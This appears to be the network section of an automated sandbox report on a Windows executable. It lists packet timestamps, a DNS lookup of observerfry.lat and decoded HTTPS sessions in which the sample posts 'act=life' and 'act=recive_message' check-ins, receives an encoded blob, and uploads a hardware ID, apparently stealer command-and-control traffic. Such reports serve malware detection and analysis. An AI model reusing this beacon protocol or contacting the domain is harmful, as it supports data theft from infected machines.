                                                                                                      Dec 23, 2024 17:41:24.310321093 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:24.310376883 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:24.310553074 CET49737443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:24.310579062 CET44349737104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:24.927280903 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:24.927344084 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:24.927434921 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:24.927912951 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:24.927930117 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.141709089 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.141782999 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.143630981 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.143639088 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.144032001 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.145711899 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.146591902 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.146646976 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.146739006 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.146780968 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.146828890 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.146886110 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147025108 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147156954 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147198915 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147336006 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147366047 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147546053 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147573948 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147583961 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147598028 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147739887 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147764921 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.147789955 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147919893 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.147950888 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.191354990 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.191513062 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.191551924 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.191580057 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.239342928 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:26.239422083 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:26.283337116 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:28.564409971 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:28.564551115 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:28.564662933 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.564662933 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.643532991 CET49757443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.643564939 CET44349757104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:28.643780947 CET49757443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.644098997 CET49757443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.644110918 CET44349757104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:28.870240927 CET49744443192.168.2.10104.21.36.201
                                                                                                      Dec 23, 2024 17:41:28.870275021 CET44349744104.21.36.201192.168.2.10
                                                                                                      Dec 23, 2024 17:41:29.370441914 CET49757443192.168.2.10104.21.36.201
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 23, 2024 17:41:09.442312002 CET5380853192.168.2.101.1.1.1
                                                                                                      Dec 23, 2024 17:41:09.685910940 CET53538081.1.1.1192.168.2.10
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 23, 2024 17:41:09.442312002 CET192.168.2.101.1.1.10x57beStandard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 23, 2024 17:41:06.280811071 CET1.1.1.1192.168.2.100xbb2fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 23, 2024 17:41:06.280811071 CET1.1.1.1192.168.2.100xbb2fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                      Dec 23, 2024 17:41:09.685910940 CET1.1.1.1192.168.2.100x57beNo error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                      Dec 23, 2024 17:41:09.685910940 CET1.1.1.1192.168.2.100x57beNo error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                      • observerfry.lat
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.1049707104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:10 UTC262OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                      Data Ascii: act=life
                                                                                                      2024-12-23 16:41:11 UTC1125INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:11 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=s8as628tvo5b5ihnmqin55vkql; expires=Fri, 18 Apr 2025 10:27:50 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLTBDQaNDdKUdCY4QKdyaOzmHOsEFHZb2ZmLoYwS7EDt4a1d%2BoxKOZNJdhDhY%2FHugvsq2fYRsM5nx9Wbl3UT%2FqUsyE%2F6TcECt2nWHzHKBxAPfn3eq6uyAfWpEAXomLUmcoA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc34efd843dc-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=604&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1814791&cwnd=239&unsent_bytes=0&cid=d83f112f22ebd6c4&ts=771&x=0"
                                                                                                      2024-12-23 16:41:11 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                      Data Ascii: 2ok
                                                                                                      2024-12-23 16:41:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.1049713104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:12 UTC263OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 47
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:12 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                      2024-12-23 16:41:13 UTC1127INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:13 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=ordna53fqq1lv96to3sulphc25; expires=Fri, 18 Apr 2025 10:27:52 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=38Ca%2FG34nGmBfzMdRb5ipDTa%2FqlNqwY0uZVkemlI%2Bf2kqAp7SlPajqG1I5fI96otwfEC7aDvMMham64P9ROhv9DBeHsK1vPXfo0tA%2FNTCVg7gxOep%2BD4oGDRn19R6Hfkv8o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f69cc416fe84381-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1598&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=946&delivery_rate=1795817&cwnd=211&unsent_bytes=0&cid=f059ddaf4380e2c5&ts=776&x=0"
                                                                                                      2024-12-23 16:41:13 UTC242INData Raw: 34 36 64 0d 0a 77 6b 45 74 52 39 70 6a 64 34 54 73 71 31 57 79 69 6a 58 5a 46 72 57 59 4e 67 36 57 4d 32 75 6f 65 71 2b 43 2b 67 6a 66 6f 63 36 35 59 31 74 6c 34 46 64 62 70 70 2f 4f 64 34 6a 2b 52 36 78 7a 6d 62 70 58 61 72 51 4a 44 63 6b 57 33 4f 66 57 4b 71 6e 4d 37 50 67 6e 54 43 75 70 42 6c 75 6d 69 64 4e 33 69 4e 46 4f 2b 33 50 62 75 67 77 73 38 31 6b 4a 79 52 62 4e 34 35 46 6e 72 38 32 74 71 69 31 4b 4c 37 38 41 45 2b 57 41 78 6a 44 58 37 31 53 7a 65 4e 7a 31 58 6d 4f 30 48 30 6e 4e 41 49 32 34 32 45 57 36 31 61 2b 50 49 46 34 73 2b 42 35 62 2f 38 37 4f 4f 35 43 77 46 37 68 7a 31 2f 52 51 61 76 31 62 41 38 41 65 7a 4f 61 51 65 4c 62 48 70 71 6f 6a 53 53 36 31 43 51 66 6f 69 73 45 37 30 65 56 55 2b 7a 71 58 2f
                                                                                                      Data Ascii: 46dwkEtR9pjd4Tsq1WyijXZFrWYNg6WM2uoeq+C+gjfoc65Y1tl4Fdbpp/Od4j+R6xzmbpXarQJDckW3OfWKqnM7PgnTCupBlumidN3iNFO+3Pbugws81kJyRbN45Fnr82tqi1KL78AE+WAxjDX71SzeNz1XmO0H0nNAI242EW61a+PIF4s+B5b/87OO5CwF7hz1/RQav1bA8AezOaQeLbHpqojSS61CQfoisE70eVU+zqX/
                                                                                                      2024-12-23 16:41:13 UTC898INData Raw: 55 77 73 72 42 46 61 2b 42 76 63 38 59 31 6e 72 63 58 73 76 32 31 57 5a 62 38 4e 56 62 37 4f 77 54 76 65 37 56 53 30 63 39 62 36 52 6d 50 30 55 67 48 43 48 4d 66 76 6c 32 57 7a 79 61 75 6f 4b 6b 67 71 76 77 6b 54 36 59 32 4a 65 5a 44 76 54 2f 73 73 6c 39 70 45 62 2f 64 46 42 4e 74 59 30 71 36 42 4b 72 72 50 37 50 68 6a 53 53 75 35 44 42 58 30 68 73 49 38 31 66 70 63 73 6e 6e 61 2b 6c 6c 6d 2b 31 49 4a 7a 52 4c 48 37 35 4a 75 73 4d 36 71 6f 43 4d 50 61 2f 67 47 44 61 62 57 69 52 54 56 2b 46 43 33 59 70 58 41 46 48 4f 36 53 45 6e 4e 46 49 32 34 32 47 4b 34 77 4b 2b 72 4c 45 77 74 73 78 4d 56 39 49 6a 45 4d 73 4c 75 55 72 56 2b 31 4f 68 65 59 76 4a 53 41 4d 45 52 79 4f 65 63 4b 76 4f 44 71 37 68 6a 46 32 57 5a 44 42 37 71 68 4e 34 33 6b 50 63 5a 6f 6a 54 51
                                                                                                      Data Ascii: UwsrBFa+Bvc8Y1nrcXsv21WZb8NVb7OwTve7VS0c9b6RmP0UgHCHMfvl2WzyauoKkgqvwkT6Y2JeZDvT/ssl9pEb/dFBNtY0q6BKrrP7PhjSSu5DBX0hsI81fpcsnna+llm+1IJzRLH75JusM6qoCMPa/gGDabWiRTV+FC3YpXAFHO6SEnNFI242GK4wK+rLEwtsxMV9IjEMsLuUrV+1OheYvJSAMERyOecKvODq7hjF2WZDB7qhN43kPcZojTQ
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 34 34 61 66 0d 0a 46 4e 36 74 45 35 48 30 31 6a 4b 37 4e 67 79 2f 63 79 6a 72 79 74 50 4a 4c 77 4d 45 65 65 44 78 54 37 54 35 46 75 7a 65 64 76 2b 57 32 54 38 55 67 48 59 46 73 50 6d 6e 6d 71 34 67 2b 4c 67 4a 46 64 6c 34 45 45 78 36 4a 6e 64 50 4a 4c 64 56 4c 56 36 30 4f 77 55 63 37 70 49 53 63 30 55 6a 62 6a 59 5a 4c 44 49 6f 4b 63 71 54 69 61 34 43 78 76 70 68 4d 45 2f 30 4f 56 57 73 48 7a 52 39 31 39 6a 2b 31 59 42 79 52 54 49 37 5a 73 71 38 34 4f 72 75 47 4d 58 5a 5a 30 50 46 76 65 66 69 77 4c 54 35 6c 6d 38 59 70 66 6c 47 6e 57 30 56 67 57 4b 51 49 33 71 6e 32 32 35 7a 71 61 6a 4a 30 73 6f 74 77 67 63 37 35 7a 44 4f 39 37 36 57 72 46 78 32 66 5a 52 59 2f 52 51 43 4d 51 53 78 71 44 57 4b 72 72 62 37 50 68 6a 59 43 69 6f 45 78 2f 74 6e 34 73 43 30 2b
                                                                                                      Data Ascii: 44afFN6tE5H01jK7Ngy/cyjrytPJLwMEeeDxT7T5Fuzedv+W2T8UgHYFsPmnmq4g+LgJFdl4EEx6JndPJLdVLV60OwUc7pISc0UjbjYZLDIoKcqTia4CxvphME/0OVWsHzR919j+1YByRTI7Zsq84OruGMXZZ0PFvefiwLT5lm8YpflGnW0VgWKQI3qn225zqajJ0sotwgc75zDO976WrFx2fZRY/RQCMQSxqDWKrrb7PhjYCioEx/tn4sC0+
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 6c 39 56 58 65 76 34 52 46 6f 51 42 6a 65 65 55 4b 75 57 44 70 71 77 6e 54 43 6d 78 44 52 6a 6e 69 73 34 36 31 4f 68 52 76 58 48 57 38 56 78 67 2b 31 73 46 7a 68 54 45 35 70 52 70 76 73 58 73 37 6d 4e 49 50 66 68 5a 56 63 65 44 77 6a 76 51 36 30 61 38 4e 4a 6d 36 57 6d 72 30 45 56 48 63 43 4e 72 6e 68 79 53 6b 67 36 75 73 59 78 64 6c 73 68 4d 51 36 49 72 44 4d 74 54 6b 58 62 74 78 78 66 4a 53 61 2f 68 5a 44 4d 55 65 79 4f 32 66 59 62 37 52 76 71 4d 6e 51 53 6e 34 54 31 58 68 6c 6f 6c 76 6b 4d 31 41 75 47 54 52 2b 52 52 7a 75 6b 68 4a 7a 52 53 4e 75 4e 68 71 73 38 2b 6e 70 79 68 45 49 62 77 42 47 4f 32 41 78 7a 37 63 34 46 75 38 5a 74 72 2f 58 47 62 39 56 41 58 48 47 39 2f 6a 6d 53 72 7a 67 36 75 34 59 78 64 6c 6e 7a 49 69 78 63 37 57 65 63 6d 6f 55 4c 63
                                                                                                      Data Ascii: l9VXev4RFoQBjeeUKuWDpqwnTCmxDRjnis461OhRvXHW8Vxg+1sFzhTE5pRpvsXs7mNIPfhZVceDwjvQ60a8NJm6Wmr0EVHcCNrnhySkg6usYxdlshMQ6IrDMtTkXbtxxfJSa/hZDMUeyO2fYb7RvqMnQSn4T1XhlolvkM1AuGTR+RRzukhJzRSNuNhqs8+npyhEIbwBGO2Axz7c4Fu8Ztr/XGb9VAXHG9/jmSrzg6u4YxdlnzIixc7WecmoULc
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 47 2f 37 57 6b 6e 56 56 74 53 67 6e 32 62 39 6d 2b 79 6e 4b 30 63 72 75 77 63 65 36 6f 4c 49 50 74 62 74 58 37 78 37 30 50 4e 54 62 50 4a 44 44 73 63 52 7a 65 75 52 59 4c 6e 43 70 2b 42 74 44 79 4b 67 51 55 32 6d 76 4d 34 68 77 4f 73 58 70 44 72 4f 75 6c 4e 67 74 41 6c 4a 78 77 72 4d 35 59 70 75 73 73 69 2b 71 79 56 50 49 4b 6f 47 47 65 79 42 79 6a 2f 64 36 31 2b 70 64 4e 72 36 52 6e 37 79 57 67 65 4b 56 6f 33 6e 67 43 72 6c 67 35 32 33 4b 41 38 36 39 68 68 56 34 59 4b 4a 62 35 44 72 58 62 5a 36 78 66 35 53 5a 2f 64 66 41 63 38 51 79 65 71 56 5a 62 62 4a 70 61 67 6a 51 43 43 77 43 68 50 6f 6a 38 38 37 33 61 67 5a 2b 33 50 50 75 67 77 73 30 30 73 45 7a 41 2f 63 31 5a 39 71 37 49 4f 7a 37 6a 6f 50 49 72 52 42 54 61 61 44 78 54 33 64 37 56 4f 7a 63 39 54 37
                                                                                                      Data Ascii: G/7WknVVtSgn2b9m+ynK0cruwce6oLIPtbtX7x70PNTbPJDDscRzeuRYLnCp+BtDyKgQU2mvM4hwOsXpDrOulNgtAlJxwrM5Ypussi+qyVPIKoGGeyByj/d61+pdNr6Rn7yWgeKVo3ngCrlg523KA869hhV4YKJb5DrXbZ6xf5SZ/dfAc8QyeqVZbbJpagjQCCwChPoj8873agZ+3PPugws00sEzA/c1Z9q7IOz7joPIrRBTaaDxT3d7VOzc9T7
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 59 46 69 6b 43 4e 37 70 56 73 76 4d 4b 6b 71 43 4e 4a 4c 37 77 43 48 4f 57 4a 77 44 48 62 36 31 32 30 63 39 48 2b 56 47 66 7a 58 77 2f 50 45 38 53 67 31 69 71 36 32 2b 7a 34 59 32 6b 47 71 68 4d 6e 36 49 33 53 64 38 2b 6d 54 76 74 7a 32 37 6f 4d 4c 50 39 5a 42 74 67 64 78 4f 69 63 59 37 33 48 70 71 30 6b 54 79 43 31 42 42 48 6f 69 73 34 33 33 4f 64 51 73 33 76 54 2b 6c 73 73 75 68 45 4f 30 6c 69 56 6f 4c 68 68 71 2b 4b 69 71 7a 45 50 4f 76 59 59 56 65 47 43 69 57 2b 51 35 6c 36 36 66 4e 6e 32 58 47 6a 6d 55 51 4c 44 46 38 7a 76 6d 47 6d 38 79 61 53 79 4a 55 38 75 73 41 59 64 34 6f 44 62 4e 74 2b 6f 47 66 74 7a 7a 37 6f 4d 4c 4d 56 48 44 73 30 58 6a 38 6d 66 63 62 7a 4a 72 36 73 76 44 7a 72 32 47 46 58 68 67 6f 6c 76 6b 4f 56 62 74 6e 44 46 39 6c 52 73 2f
                                                                                                      Data Ascii: YFikCN7pVsvMKkqCNJL7wCHOWJwDHb6120c9H+VGfzXw/PE8Sg1iq62+z4Y2kGqhMn6I3Sd8+mTvtz27oMLP9ZBtgdxOicY73Hpq0kTyC1BBHois433OdQs3vT+lssuhEO0liVoLhhq+KiqzEPOvYYVeGCiW+Q5l66fNn2XGjmUQLDF8zvmGm8yaSyJU8usAYd4oDbNt+oGftzz7oMLMVHDs0Xj8mfcbzJr6svDzr2GFXhgolvkOVbtnDF9lRs/
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 54 77 2b 57 5a 5a 72 66 45 6f 72 49 69 52 53 6d 35 42 68 4c 74 6e 4d 49 6c 32 2b 42 55 74 58 7a 65 2b 6c 70 73 39 56 77 4a 69 6c 61 4e 35 34 41 71 35 59 4f 4a 67 7a 52 5a 4c 2f 6f 69 41 76 43 45 7a 6a 76 47 34 31 61 34 59 74 72 71 46 43 4b 30 51 41 37 62 57 4a 58 32 69 48 32 36 33 4f 4b 35 59 30 67 70 2b 46 6c 56 37 59 48 48 4f 74 76 73 58 72 35 38 31 50 39 52 5a 76 68 64 43 4d 49 52 78 2b 57 64 62 4c 66 41 6f 71 38 69 51 79 47 78 44 78 79 6d 77 49 6b 77 79 4b 67 50 2b 30 4c 48 2f 55 78 68 35 42 4d 37 79 51 6e 63 39 5a 56 36 75 34 47 44 6f 79 39 4d 49 4c 38 52 56 66 6e 41 30 48 66 58 35 42 66 6a 4e 4e 66 2b 57 47 2f 7a 58 77 62 48 46 38 72 72 6c 32 43 7a 30 61 4f 6c 4b 30 4d 74 74 52 4d 66 37 4a 7a 41 50 74 33 6d 58 36 6c 33 6c 37 51 55 61 2b 77 52 55 59
                                                                                                      Data Ascii: Tw+WZZrfEorIiRSm5BhLtnMIl2+BUtXze+lps9VwJilaN54Aq5YOJgzRZL/oiAvCEzjvG41a4YtrqFCK0QA7bWJX2iH263OK5Y0gp+FlV7YHHOtvsXr581P9RZvhdCMIRx+WdbLfAoq8iQyGxDxymwIkwyKgP+0LH/Uxh5BM7yQnc9ZV6u4GDoy9MIL8RVfnA0HfX5BfjNNf+WG/zXwbHF8rrl2Cz0aOlK0MttRMf7JzAPt3mX6l3l7QUa+wRUY
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 71 58 79 77 30 36 2b 6c 4a 48 45 62 74 67 59 42 34 59 44 50 4e 35 43 6d 46 37 51 30 6a 38 4d 55 4a 4c 52 75 52 34 6f 41 6a 62 6a 59 58 37 37 4e 6f 71 63 31 58 6d 69 62 46 67 50 73 6c 59 73 52 31 2f 6c 65 72 58 6e 46 75 68 6f 73 38 68 46 52 6d 6c 61 4e 35 49 6b 71 35 5a 50 2b 2b 33 59 63 63 75 68 54 43 71 69 58 69 53 47 51 73 41 58 31 4e 4d 57 36 44 43 79 7a 55 68 76 59 48 73 37 32 6d 79 32 44 2f 59 79 72 4e 55 34 6f 73 77 30 72 32 4a 76 4b 4f 64 37 76 51 61 6f 30 6d 62 70 62 4c 4b 78 6f 53 59 4a 59 38 71 37 59 63 76 32 62 37 4a 55 67 51 53 75 2f 46 77 53 72 72 73 49 68 30 65 56 63 74 7a 62 57 39 30 52 72 74 42 39 4a 7a 46 69 56 73 4e 59 71 75 64 4c 73 2b 48 4d 64 66 75 31 53 51 72 62 63 31 6e 6e 4a 71 45 48 37 4c 49 57 30 46 48 36 30 43 55 6d 4e 47 39 2f
                                                                                                      Data Ascii: qXyw06+lJHEbtgYB4YDPN5CmF7Q0j8MUJLRuR4oAjbjYX77Noqc1XmibFgPslYsR1/lerXnFuhos8hFRmlaN5Ikq5ZP++3YccuhTCqiXiSGQsAX1NMW6DCyzUhvYHs72my2D/YyrNU4osw0r2JvKOd7vQao0mbpbLKxoSYJY8q7Ycv2b7JUgQSu/FwSrrsIh0eVctzbW90RrtB9JzFiVsNYqudLs+HMdfu1SQrbc1nnJqEH7LIW0FH60CUmNG9/
                                                                                                      2024-12-23 16:41:13 UTC1369INData Raw: 4d 43 73 71 32 4d 42 5a 62 35 42 54 62 54 41 69 54 50 42 71 41 2f 72 4a 6f 79 76 42 7a 75 6b 41 78 61 45 41 59 33 32 32 44 4c 76 6a 65 79 79 59 78 64 6c 2f 77 49 48 39 49 6a 4b 49 64 4f 76 61 59 56 53 31 50 31 53 62 2f 70 47 47 49 67 33 7a 75 75 55 5a 72 72 56 6b 70 34 32 54 43 75 32 42 67 50 33 7a 6f 64 33 33 36 67 50 67 6a 54 47 38 46 4d 67 76 42 30 59 32 52 62 47 39 70 38 71 67 6f 33 73 75 47 4d 58 5a 59 30 43 47 2b 69 4a 33 79 61 64 7a 6c 53 38 63 74 54 30 51 33 32 30 48 30 6e 4d 57 4a 57 79 31 69 71 35 30 75 7a 34 63 78 31 2b 37 56 4a 43 74 74 7a 57 65 63 6d 6f 51 66 73 73 68 4c 51 55 66 72 51 4a 53 59 30 57 77 4f 47 62 5a 4c 37 52 76 71 59 67 57 53 62 2f 50 79 76 44 67 38 51 79 33 75 39 70 68 56 58 64 36 6c 6c 6a 38 32 38 33 2f 51 6e 4b 38 4e 70 4d
                                                                                                      Data Ascii: MCsq2MBZb5BTbTAiTPBqA/rJoyvBzukAxaEAY322DLvjeyyYxdl/wIH9IjKIdOvaYVS1P1Sb/pGGIg3zuuUZrrVkp42TCu2BgP3zod336gPgjTG8FMgvB0Y2RbG9p8qgo3suGMXZY0CG+iJ3yadzlS8ctT0Q320H0nMWJWy1iq50uz4cx1+7VJCttzWecmoQfsshLQUfrQJSY0WwOGbZL7RvqYgWSb/PyvDg8Qy3u9phVXd6llj8283/QnK8NpM


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.1049719104.21.36.2014438044C:\Users\user\Desktop\NxqDwaYpbp.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 16:41:15 UTC281OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=UQQCP3F4J93MFUWZ2C
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 12847
                                                                                                      Host: observerfry.lat
                                                                                                      2024-12-23 16:41:15 UTC12847OUTData Raw: 2d 2d 55 51 51 43 50 33 46 34 4a 39 33 4d 46 55 57 5a 32 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 35 43 41 38 31 31 42 36 36 32 32 36 38 46 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 51 51 43 50 33 46 34 4a 39 33 4d 46 55 57 5a 32 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 51 51 43 50 33 46 34 4a 39 33 4d 46 55 57 5a 32 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f
                                                                                                      Data Ascii: --UQQCP3F4J93MFUWZ2CContent-Disposition: form-data; name="hwid"325CA811B662268FAC8923850305D13E--UQQCP3F4J93MFUWZ2CContent-Disposition: form-data; name="pid"2--UQQCP3F4J93MFUWZ2CContent-Disposition: form-data; name="lid"PsFKDg--pablo
                                                                                                      2024-12-23 16:41:17 UTC1132INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 16:41:17 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
